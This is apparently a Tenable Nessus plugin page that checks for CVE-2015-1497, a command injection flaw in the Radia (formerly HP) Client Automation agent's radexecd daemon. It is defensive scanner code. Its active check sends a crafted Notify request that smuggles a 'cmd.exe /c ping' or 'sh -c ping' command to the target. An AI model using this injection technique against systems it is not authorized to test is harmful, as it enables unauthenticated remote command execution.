The Persistent Systems Radia Client Automation (formerly HP Client Automation) agent listening on the remote port is affected by a command execution vulnerability due to a flaw in the radexecd.exe component. An unauthenticated, remote attacker can exploit this to execute arbitrary commands in the context of the radexecd process.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration pass: when the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script exits before any
# network activity. The identifiers (script_id, CVE, BID, EDB, CPE) are
# what downstream tooling keys on, so they must stay exactly as declared.
if (description)
{
script_id(86427);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
# Tracked vulnerability and public exploit references.
script_cve_id("CVE-2015-1497");
script_bugtraq_id(72612);
script_xref(name:"EDB-ID", value:"36169");
script_xref(name:"EDB-ID", value:"36206");
script_name(english:"Persistent Systems Radia Client Automation Agent Command Injection");
script_set_attribute(attribute:"synopsis", value:
"The Persistent Systems Radia Client Automation agent listening on the
remote port is affected by a command injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The Persistent Systems Radia Client Automation (formerly HP Client
Automation) agent listening on the remote port is affected by a
command execution vulnerability due to a flaw in the radexecd.exe
component. An unauthenticated, remote attacker can exploit this to
execute arbitrary commands in the context of the radexecd process.");
# https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?56b928e5");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-038/");
script_set_attribute(attribute:"solution", value:
"See the vendor advisory for a possible solution.");
# CVSS2: network-reachable, low complexity, no authentication, full C/I/A
# impact; temporal vector records a functional public exploit and an
# official fix.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
# exploited_by_nessus: the check below actively triggers the flaw rather
# than inferring it from a banner or version string.
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'HP Client Automation Command Injection');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/10/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
# Two CPEs because the product was rebranded from HP to Persistent Systems.
script_set_attribute(attribute:"cpe", value:"cpe:/a:persistent_systems:radia_client_automation");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:client_automation_enterprise");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
# ACT_ATTACK: this plugin sends a payload to the target and may cause it
# to execute a command; it runs in the attack phase, after detection.
script_category(ACT_ATTACK);
script_family(english:"General");
script_copyright(english:"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.");
# The detection plugin supplies the "Services/radexecd" and
# "radexecd/<port>/noauth" KB entries read below; os_fingerprint.nasl
# supplies "Host/OS", which selects the payload flavour.
script_dependencies("ovcm_notify_daemon_detect.nasl", "os_fingerprint.nasl");
script_require_keys("Services/radexecd");
script_exclude_keys("global_settings/supplied_logins_only");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("dump.inc");
# Scan-policy gate: when the policy restricts checks to supplied logins,
# stop before any network probe is sent.
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
# The port for the Notify daemon (radexecd)
port = get_service(svc:'radexecd', default:3465, exit_on_fail:TRUE);
# Attack only if the detection plugin determines noauth is enabled
# for radexecd
# NOTE(review): the noauth key is presumably populated by
# ovcm_notify_daemon_detect.nasl (declared dependency) — confirm there.
# Anything other than an explicit TRUE (including a missing key) skips
# the active check, so an incomplete detection result fails closed.
if (get_kb_item("radexecd/" + port + "/noauth") != TRUE)
exit(0, "User authentication for radexecd on port " + port + " seems to be enabled, skipping the attack.");
# Payload selection by fingerprinted OS. Both variants only ping the
# scanner host; the ping is a side effect, not the detection signal.
# On a target this shows up as a child process of radexecd (cmd.exe or
# sh) plus ICMP egress toward the scanner — a useful detection artefact
# for anyone monitoring the agent host.
os = get_kb_item("Host/OS");
if(os && "windows" >< tolower(os))
{
injected = 'cmd.exe /c ping ' + compat::this_host();
cmd = 'hide hide"\t"' + injected;
}
# Injected command may fail if it is not available on the target
# host, but a vulnerable server will still return '\x00' in response.
# Unknown or non-Windows OS falls through to the Unix variant.
else
{
injected = 'sh -c "ping -c 3 ' + compat::this_host() + '"';
cmd = 'hide hide\t' + injected;
}
s = open_sock_tcp(port);
if(!s) audit(AUDIT_SOCK_FAIL, port);
# Notify request: NUL-terminated fields. The user/password fields carry
# the plugin name so the attempt is attributable in the target's logs
# if the daemon records them (not verified here).
req = '\x00' + # return port; insignificant
'USER_' + SCRIPT_NAME + '\x00' +
'PASS_' + SCRIPT_NAME + '\x00' +
cmd + '\x00';
send(socket: s, data: req);
# Single read of up to 1024 bytes; the socket is closed before the
# response is examined, so no further exchange happens.
res = recv(socket: s, length:1024);
close(s);
if (isnull(res))
audit(AUDIT_RESP_NOT, port, "a Notify request");
# Vulnerable
# Exact-match on a lone NUL byte. An empty (non-null) response or any
# other data is treated as "probably not affected" and dumped for triage.
if (res == '\x00')
security_hole(port: port);
else
exit(0, "The service listening on port " + port + ' returned the following response, and is probably not affected.\n' + hexdump(ddata:res));
Vendor | Product | Version | CPE |
---|---|---|---|
persistent_systems | radia_client_automation | | cpe:/a:persistent_systems:radia_client_automation |
hp | client_automation_enterprise | | cpe:/a:hp:client_automation_enterprise |